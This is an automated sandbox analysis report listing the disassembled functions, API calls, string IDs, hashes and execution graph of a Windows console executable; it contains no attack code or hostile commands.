                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EED000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EF1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EFF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284514965.00007FF706F09000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_7ff706eb0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: wcschr$Heap$AllocCloseOpenProcessiswspace
                                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID: Software\Classes
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 2714550308-1656466771
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: eb7f4015b54f8209f821cd25b29d275aeb821b067b2f4fde3e660eb3c9d82795
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 0b47ce2809022f3e4184438290ed4214e1da36f9068b7e5ef6b65b67e52e09f9
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: eb7f4015b54f8209f821cd25b29d275aeb821b067b2f4fde3e660eb3c9d82795
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E8418E26A09B5281EA00FB16DC6503BA3A4FF84BD0F948231DA5E477E6DF39E856C350
                                                                                                                                                                                                                                                                                                                                                                                                                                          Function 00007FF706EDA0B0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 98registryCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                          • RegOpenKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0 ref: 00007FF706EDA0FC
                                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF706EBD3F0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0 ref: 00007FF706EBD46E
                                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF706EBD3F0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0 ref: 00007FF706EBD485
                                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF706EBD3F0: wcschr.MSVCRT ref: 00007FF706EBD4EE
                                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF706EBD3F0: iswspace.MSVCRT ref: 00007FF706EBD54D
                                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF706EBD3F0: wcschr.MSVCRT ref: 00007FF706EBD569
                                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF706EBD3F0: wcschr.MSVCRT ref: 00007FF706EBD58C
                                                                                                                                                                                                                                                                                                                                                                                                                                          • RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0 ref: 00007FF706EDA1FB
                                                                                                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000009.00000002.1284341191.00007FF706EB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF706EB0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284320265.00007FF706EB0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284371657.00007FF706EE2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EED000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EF1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EFF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284514965.00007FF706F09000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_7ff706eb0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: wcschr$Heap$AllocCloseOpenProcessiswspace
                                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID: Software\Classes
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 2714550308-1656466771
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 8d4a83688f0bdb6c4652951bc114003fef2692198ab2fb548b80d57547a1bced
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 5008f03a1ce57c573054c4028e3e56fbd411e9af7b06a0f20c201a9612a9c7dd
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8d4a83688f0bdb6c4652951bc114003fef2692198ab2fb548b80d57547a1bced
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 61418122A09B5281EA00FB1ADC6443BA3A4FF447D0F948231DB5D477E5DF39E946C350
                                                                                                                                                                                                                                                                                                                                                                                                                                          Function 00007FF706EBCAD4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 83COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000009.00000002.1284341191.00007FF706EB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF706EB0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284320265.00007FF706EB0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284371657.00007FF706EE2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EED000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EF1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EFF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284514965.00007FF706F09000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_7ff706eb0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: ConsoleTitle
                                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID: -
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 3358957663-3695764949
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 6064907e277deedeb5a502c31a0978855624e0bf0fd413fe06aa3058ee5bb337
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: c44fb311b7e45a98a2fd35e1ec919808df9f3174ea85e01df2aeca885ff5bf7d
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6064907e277deedeb5a502c31a0978855624e0bf0fd413fe06aa3058ee5bb337
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3931BE21A0C74286EA14BB11AC6407BEAA4FF59FA0FE55635CA0E077D9DF3CE451C320
                                                                                                                                                                                                                                                                                                                                                                                                                                          Function 00007FF706EC7280 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 74COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000009.00000002.1284341191.00007FF706EB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF706EB0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284320265.00007FF706EB0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284371657.00007FF706EE2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EED000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EF1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EFF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284514965.00007FF706F09000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_7ff706eb0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: _wcsnicmpswscanf
                                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID: :EOF
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 1534968528-551370653
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 0653d2a24574df907a156a73786289bc793a3e356bc39756bce3d9cad3207eea
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: b92a9bb713a992965f50b1033f3a0a4a1e9491b68bb07aa15d749174585f2380
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0653d2a24574df907a156a73786289bc793a3e356bc39756bce3d9cad3207eea
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6E316F75E08742C6FB14BB19AC642BAF6A0FF54B60FC44531EE4D06295DF2CE8528B64
                                                                                                                                                                                                                                                                                                                                                                                                                                          Function 00007FF706EB3BE4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000009.00000002.1284341191.00007FF706EB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF706EB0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284320265.00007FF706EB0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284371657.00007FF706EE2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EED000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EF1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EFF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284514965.00007FF706F09000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_7ff706eb0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: _wcsnicmp
                                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID: /-Y
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 1886669725-4274875248
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 772bd3782c46842c372c8b89a915565f11f80ecece3792b3c4e3ce842e7c51e5
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 702dd6039b464f2e69e34c71de8ebe35fefd22f9f6d86ed595bf5c714085f997
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 772bd3782c46842c372c8b89a915565f11f80ecece3792b3c4e3ce842e7c51e5
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2E21816AE0876581EB10AB42AD6117BF6A1BF54FC0F949131DE880B794DF3CE482D720
                                                                                                                                                                                                                                                                                                                                                                                                                                          Function 00007FF706EBB62C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 38COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000009.00000002.1284341191.00007FF706EB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF706EB0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284320265.00007FF706EB0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284371657.00007FF706EE2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EED000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EF1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EFF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284514965.00007FF706F09000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_7ff706eb0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID: 3$3
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 0-2538865259
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: b8f86acd81ff1c6da407d28336be8d8a1ddaaa1636690dcce93971c28c339212
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: fa53b98978456032357b7207193167d0cc225cb9200a52066a417c2a863cce27
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b8f86acd81ff1c6da407d28336be8d8a1ddaaa1636690dcce93971c28c339212
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9A015771D1E7829AF318BB60ACA4277FA60BF64351FD41236C41E025A1DF2C68A5C671
                                                                                                                                                                                                                                                                                                                                                                                                                                          Function 00007FF706EC06C0 Relevance: 5.1, APIs: 4, Instructions: 97memoryCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                          • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF706EBB4DB), ref: 00007FF706EC06D6
                                                                                                                                                                                                                                                                                                                                                                                                                                          • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF706EBB4DB), ref: 00007FF706EC06F0
                                                                                                                                                                                                                                                                                                                                                                                                                                          • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF706EBB4DB), ref: 00007FF706EC074D
                                                                                                                                                                                                                                                                                                                                                                                                                                          • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF706EBB4DB), ref: 00007FF706EC0762
                                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000009.00000002.1284341191.00007FF706EB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF706EB0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284320265.00007FF706EB0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284371657.00007FF706EE2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EED000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EF1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EFF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284514965.00007FF706F09000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_7ff706eb0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: Heap$AllocProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 1617791916-0
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: cb757f755a027b81a776796b91978963b45d8166734cf522aad66d61178eecf0
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 072efb953378862f576394cf8f245ad8125689c0a541a6717e5f20c107616034
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: cb757f755a027b81a776796b91978963b45d8166734cf522aad66d61178eecf0
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: CB414872A09B42C6EA18AB10EC6417BFBA0FF95B90FD88435CA5D03794DF3DA541C760

                                                                                                                                                                                                                                                                                                                                                                                                                                          Execution Graph

                                                                                                                                                                                                                                                                                                                                                                                                                                          Execution Coverage:5.7%
                                                                                                                                                                                                                                                                                                                                                                                                                                          Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                                                                                                                                                                                                                                          Signature Coverage:0%
                                                                                                                                                                                                                                                                                                                                                                                                                                          Total number of Nodes:851
                                                                                                                                                                                                                                                                                                                                                                                                                                          Total number of Limit Nodes:21
                                                                                                                                                                                                                                                                                                                                                                                                                                          execution_graph 18315 7ff706ebb3f0 18317 7ff706ebb41a 18315->18317 18316 7ff706ecc2a3 iswdigit 18316->18317 18318 7ff706ecc2b7 18316->18318 18317->18316 18319 7ff706ebb42f 18317->18319 18320 7ff706eb3278 166 API calls 18318->18320 18323 7ff706ebbe00 18319->18323 18322 7ff706ebb461 18320->18322 18324 7ff706ebbec8 18323->18324 18325 7ff706ebbe1b 18323->18325 18324->18322 18325->18324 18326 7ff706ebbe47 memset 18325->18326 18327 7ff706ebbe67 18325->18327 18429 7ff706ebbff0 18326->18429 18329 7ff706ebbe73 18327->18329 18330 7ff706ebbf29 18327->18330 18347 7ff706ebbeaf 18327->18347 18331 7ff706ebbe92 18329->18331 18333 7ff706ebbf0c 18329->18333 18332 7ff706ebcd90 166 API calls 18330->18332 18343 7ff706ebbea1 18331->18343 18357 7ff706ebc620 GetConsoleTitleW 18331->18357 18337 7ff706ebbf33 18332->18337 18467 7ff706ebb0d8 memset 18333->18467 18335 7ff706ebbff0 185 API calls 18335->18324 18338 7ff706ebbf70 18337->18338 18337->18347 18527 7ff706eb88a8 18337->18527 18351 7ff706ebbf75 18338->18351 18584 7ff706eb71ec 18338->18584 18340 7ff706ebbf1e 18340->18347 18346 7ff706ebaf98 2 API calls 18343->18346 18343->18347 18344 7ff706ebbfa9 18344->18347 18348 7ff706ebcd90 166 API calls 18344->18348 18346->18347 18347->18324 18347->18335 18350 7ff706ebbfbb 18348->18350 18350->18347 18352 7ff706ec081c 166 API calls 18350->18352 18353 7ff706ebb0d8 194 API calls 18351->18353 18352->18351 18354 7ff706ebbf7f 18353->18354 18354->18347 18400 7ff706ec5ad8 18354->18400 18358 7ff706ebca2f 18357->18358 18360 7ff706ebc675 18357->18360 18359 7ff706ecc5fc GetLastError 18358->18359 18362 7ff706eb3278 166 API calls 18358->18362 18363 7ff706ec855c ??_V@YAXPEAX 18358->18363 18359->18358 18361 7ff706ebca40 17 API calls 18360->18361 18372 7ff706ebc69b 18361->18372 18362->18358 18363->18358 18364 7ff706ec291c 8 API calls 18371 7ff706ebc762 18364->18371 18365 7ff706ebc9b5 18369 7ff706ec855c ??_V@YAXPEAX 18365->18369 18366 7ff706eb89c0 23 API calls 18366->18371 18367 7ff706ebc978 towupper 18367->18371 18368 7ff706ec855c ??_V@YAXPEAX 18368->18371 18370 7ff706ebc855 18369->18370 18375 7ff706ebc872 18370->18375 18380 7ff706ecc6b8 SetConsoleTitleW 18370->18380 18371->18358 18371->18359 18371->18364 18371->18365 18371->18366 18371->18367 18371->18368 18373 7ff706ecc60e 18371->18373 18385 7ff706ebc83d 18371->18385 18388 7ff706ebc78a wcschr 18371->18388 18390 7ff706ebca25 18371->18390 18393 7ff706ecc684 18371->18393 18395 7ff706ebca2a 18371->18395 18397 7ff706ebca16 GetLastError 18371->18397 18372->18358 18372->18365 18372->18371 18374 7ff706ebd3f0 223 API calls 18372->18374 18376 7ff706edec14 173 API calls 18373->18376 18377 7ff706ebc741 18374->18377 18379 7ff706ec855c ??_V@YAXPEAX 18375->18379 18376->18371 18378 7ff706ebc74d 18377->18378 18382 7ff706ebc8b5 wcsncmp 18377->18382 18378->18371 18590 7ff706ebbd38 18378->18590 18381 7ff706ebc87c 18379->18381 18380->18375 18384 7ff706ec8f80 7 API calls 18381->18384 18382->18371 18382->18378 18386 7ff706ebc88e 18384->18386 18598 7ff706ebcb40 18385->18598 18386->18343 18388->18371 18392 7ff706eb3278 166 API calls 18390->18392 18392->18358 18394 7ff706eb3278 166 API calls 18393->18394 18394->18358 18396 7ff706ec9158 7 API calls 18395->18396 18396->18358 18399 7ff706eb3278 166 API calls 18397->18399 18399->18358 18401 7ff706ebcd90 166 API calls 18400->18401 18402 7ff706ec5b12 18401->18402 18403 7ff706ebcb40 166 API calls 18402->18403 18427 7ff706ec5b8b 18402->18427 18405 7ff706ec5b26 18403->18405 18404 7ff706ec8f80 7 API calls 18406 7ff706ebbf99 18404->18406 18407 7ff706ec0a6c 273 API calls 18405->18407 18405->18427 18406->18343 18408 7ff706ec5b43 18407->18408 18409 7ff706ec5bb8 18408->18409 18410 7ff706ec5b48 GetConsoleTitleW 18408->18410 18411 7ff706ec5bf4 18409->18411 18412 7ff706ec5bbd GetConsoleTitleW 18409->18412 18413 7ff706ebcad4 172 API calls 18410->18413 18415 7ff706ecf452 18411->18415 18416 7ff706ec5bfd 18411->18416 18414 7ff706ebcad4 172 API calls 18412->18414 18417 7ff706ec5b66 18413->18417 18418 7ff706ec5bdb 18414->18418 18420 7ff706ec3c24 166 API calls 18415->18420 18422 7ff706ecf462 18416->18422 18423 7ff706ec5c1b 18416->18423 18416->18427 18619 7ff706ec4224 InitializeProcThreadAttributeList 18417->18619 18683 7ff706eb96e8 18418->18683 18420->18427 18426 7ff706eb3278 166 API calls 18422->18426 18425 7ff706eb3278 166 API calls 18423->18425 18424 7ff706ec5b7f 18679 7ff706ec5c3c 18424->18679 18425->18427 18426->18427 18427->18404 18430 7ff706ebc01c 18429->18430 18431 7ff706ebc0c4 18429->18431 18432 7ff706ebc022 18430->18432 18433 7ff706ebc086 18430->18433 18431->18327 18434 7ff706ebc030 18432->18434 18435 7ff706ebc113 18432->18435 18436 7ff706ebc144 18433->18436 18449 7ff706ebc094 18433->18449 18437 7ff706ebc039 wcschr 18434->18437 18447 7ff706ebc053 18434->18447 18442 7ff706ebff70 2 API calls 18435->18442 18435->18447 18438 7ff706ebc151 18436->18438 18454 7ff706ebc1c8 18436->18454 18439 7ff706ebc301 18437->18439 18437->18447 19061 7ff706ebc460 18438->19061 18443 7ff706ebcd90 166 API calls 18439->18443 18440 7ff706ebc0c6 18446 7ff706ebc0cf wcschr 18440->18446 18456 7ff706ebc073 18440->18456 18441 7ff706ebc058 18452 7ff706ebff70 2 API calls 18441->18452 18441->18456 18442->18447 18466 7ff706ebc30b 18443->18466 18445 7ff706ebc460 183 API calls 18445->18449 18450 7ff706ebc1be 18446->18450 18446->18456 18447->18440 18447->18441 18457 7ff706ebc211 18447->18457 18449->18431 18449->18445 18451 7ff706ebcd90 166 API calls 18450->18451 18451->18454 18452->18456 18453 7ff706ebc460 183 API calls 18453->18456 18454->18431 18454->18457 18458 7ff706ebc285 18454->18458 18463 7ff706ebd840 178 API calls 18454->18463 18455 7ff706ebc460 183 API calls 18455->18431 18456->18431 18456->18453 18461 7ff706ebff70 2 API calls 18457->18461 18458->18457 18462 7ff706ebb6b0 170 API calls 18458->18462 18459 7ff706ebb6b0 170 API calls 18459->18447 18460 7ff706ebd840 178 API calls 18460->18466 18461->18431 18464 7ff706ebc2ac 18462->18464 18463->18454 18464->18456 18464->18457 18465 7ff706ebc3d4 18465->18456 18465->18457 18465->18459 18466->18431 18466->18457 18466->18460 18466->18465 18468 7ff706ebca40 17 API calls 18467->18468 18484 7ff706ebb162 18468->18484 18469 7ff706ebb2e1 18470 7ff706ebb303 18469->18470 18471 7ff706ebb2f7 ??_V@YAXPEAX 18469->18471 18473 7ff706ec8f80 7 API calls 18470->18473 18471->18470 18472 7ff706ebb1d9 18476 7ff706ebcd90 166 API calls 18472->18476 18492 7ff706ebb1ed 18472->18492 18475 7ff706ebb315 18473->18475 18474 7ff706ec1ea0 8 API calls 18474->18484 18475->18331 18475->18340 18476->18492 18478 7ff706ebb228 _get_osfhandle 18481 7ff706ebb23f _get_osfhandle 18478->18481 18478->18492 18479 7ff706ecbfef _get_osfhandle SetFilePointer 18482 7ff706ecc01d 18479->18482 18479->18492 18481->18492 18483 7ff706ec33f0 _vsnwprintf 18482->18483 18485 7ff706ecc038 18483->18485 18484->18469 18484->18472 18484->18474 18484->18484 18491 7ff706eb3278 166 API calls 18485->18491 18486 7ff706ecc1c3 18490 7ff706ec33f0 _vsnwprintf 18486->18490 18487 7ff706ec01b8 6 API calls 18487->18492 18488 7ff706ebd208 _close 18488->18492 18489 7ff706ec26e0 19 API calls 18489->18492 18490->18485 18493 7ff706ecc1f9 18491->18493 18492->18469 18492->18478 18492->18479 18492->18486 18492->18487 18492->18488 18492->18489 18494 7ff706ecc060 18492->18494 18496 7ff706ebb038 _dup2 18492->18496 18497 7ff706ecc246 18492->18497 18501 7ff706ebb356 18492->18501 18526 7ff706ecc1a5 18492->18526 19075 7ff706ebaffc _dup 18492->19075 19077 7ff706edf318 _get_osfhandle GetFileType 18492->19077 18495 7ff706ebaf98 2 API calls 18493->18495 18494->18497 18499 7ff706ec09f4 2 API calls 18494->18499 18495->18469 18496->18492 18500 7ff706ebaf98 2 API calls 18497->18500 18498 7ff706ebb038 _dup2 18502 7ff706ecc1b7 18498->18502 18503 7ff706ecc084 18499->18503 18504 7ff706ecc24b 18500->18504 18510 7ff706ebaf98 2 API calls 18501->18510 18506 7ff706ecc1be 18502->18506 18507 7ff706ecc207 18502->18507 18508 7ff706ebb900 166 API calls 18503->18508 18505 7ff706edf1d8 166 API calls 18504->18505 18505->18469 18511 7ff706ebd208 _close 18506->18511 18509 7ff706ebd208 _close 18507->18509 18512 